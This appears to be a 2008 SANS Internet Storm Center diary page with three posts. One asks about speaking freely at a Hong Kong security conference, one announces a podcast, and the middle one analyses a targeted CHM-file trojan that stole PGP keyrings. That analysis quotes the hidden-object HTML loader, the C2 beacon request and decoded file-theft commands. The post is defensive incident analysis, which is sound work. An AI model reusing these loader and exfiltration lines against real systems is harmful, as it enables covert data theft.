Threat Level: green Handler on Duty: Pedro Bueno

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Freedom of Speech...or not?

Published: 2008-03-27
Last Updated: 2008-03-27 22:33:38 UTC
by Pedro Bueno (Version: 1)
4 comment(s)

When you are in your own country, you know your limits about what to say or not. This is valid for conferences, interviews, etc...

The thing is, when you are going to a foreign country, you may not know how is the freedom of speech there, so, it may become quite dangerous if you want to speak something about the country that is hosting the event.

I am going to be giving a talk in Hong Kong on hacking/security topic in a near future. I need to know what would happen if I say that China is a source of lot of the problems that I see...

Would I be in jail right after the talk? Would I be prosecuted?

I know that Hong Kong have different laws than the China itself, but it is definitely a good question, specially for me...;)

Also, if you know of a country that I would also find these kind of problems, please let me know.

-------------------------------------------------------------------------------

Pedro Bueno ( pbueno //&&// isc. sans. org. )

 

Keywords: china
4 comment(s)

Guarding the guardians: a story of PGP key ring theft

Published: 2008-03-27
Last Updated: 2008-03-27 17:25:58 UTC
by Maarten Van Horenbeeck (Version: 1)
2 comment(s)

A couple of weeks ago, we received a CHM, or Windows Help file, embedded in e-mail as part of a targeted attack campaign against an NGO. Virus detection was near zero. On Virustotal.com, two solutions actually flagged it as malicious.

After decompiling the CHM file, which you can easily do using tools such as arCHMage or chmdecompiler, I spotted the following code in the HTML content, in addition to an executable ‘music.exe’:

object width="0" height="0" style="display:none;"
type="application/x-oleobject" codebase="music.exe"

The goal of this code is to load a hidden object from the CHM container. This embedded file also was not recognized by the vast majority of anti virus vendors. The code connected to a ‘fake’ web server at a Hong Kong ISP, and issued the following request:

GET /scripts/msadce.exe/?UID=DD01x51 HTTP/1.0

When you see something like this, it raises suspicion that the UID is in fact a ‘command’ to a control server. In reality, the web server turned out not a web server at all. Any query but the above was answered with an immediate disconnect. In response to the above request, the server responded with a large BASE64 encoded response, which turned out to be an additional executable file. The trojan then executed this file, being its second stage payload.

This file subsequently connected to a second server, being the actual control server. It sent an identical registration URI as above to this machine. In return, the server responded with another BASE64 encoded string. This was much shorter, and once decoded, turned out to be:

      <Command Begin>
      netmgetr usb:\*.doc
      netmgetr usb:\*.pkr
      netmgetr usb:\*.skr
      netlsr usb:\*.*
      <Command End>

Upon further review of the trojan code, netmgetr scanned the file system for a filename and then copies it from the system. This is interesting, because reports of malware looking for PGP keyrings (the .skr and .pkr files in the above example) are rare. There have been instances, such as the ’99 Caligula macro-virus, but this was more proof-of-concept code.

In this case, the code above was combined with a keylogger, so the passphrase could have been grabbed as well. However, we did not see this happening. It appears the attacker's goal was to “map” who was talking to whom encrypted. In this attack, the latter information appears to have been actively used to send malware to other people in a more convincing way.

There are two things we can learn from this:

  • It’s clear that we should understand that the network that houses our data is not just a network of machines. It’s a network of people. Knowing who talks to whom and how is valuable help for an attacker in selecting his next targets, and making them look "normal";
  • When we use strong encryption, attackers will not try to "break" that encryption. They will move to the endpoints to steal the keys that are used to encrypt it. Ensure sufficient security is implemented on key storage.

Cheers,

Maarten Van Horenbeeck
maarten at daemon.be

2 comment(s)

Internet Storm Center Podcast

Published: 2008-03-27
Last Updated: 2008-03-27 17:25:21 UTC
by Johannes Ullrich (Version: 1)
4 comment(s)
Quick update: The last episode ("Episode 1") is not available as MP3. We had some issues with MP3s initially, but I think its solved now. Enjoy.

Joel and I got together to record a podcast. We would like to make this a regular feature, and include the monthly threat update webcast. The idea is to create an episode every 2 weeks. One episode each month will be published on "reboot wednesday". Another episode would follow 2 weeks later.

At this point, I set up 4 "Episodes"

 

  • 2 old webcasts (the last two) unchanged.
  • 1 "presentation" with slides about getting started with IPv6
  • and the new "podcast"

At this point, this is a test to see how the different formats work and which format you prefer most. The last "episode" is what I think these podcasts will come out like in the future. We are very interested in feedback!

(and yes... we know Joel is a bit "soft"... its hard to get me quiet... i had the microphone running with attenuator and put it about 3 feet away from me)

Try to search for the podcast in itunes if you use itunes (it should be up there... but I haven't found it yet :-( )
iTunes direct URL: http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=276609412(iTunes hasn't indexed our podcast yet, so you have to use this direct link)
The direct URL for the podcast: http://isc.sans.org/podcast.xml

------
Johannes B. Ullrich Ph.D.
jullrich \a t/ sans.org

Keywords: podcast
4 comment(s)
Diary Archives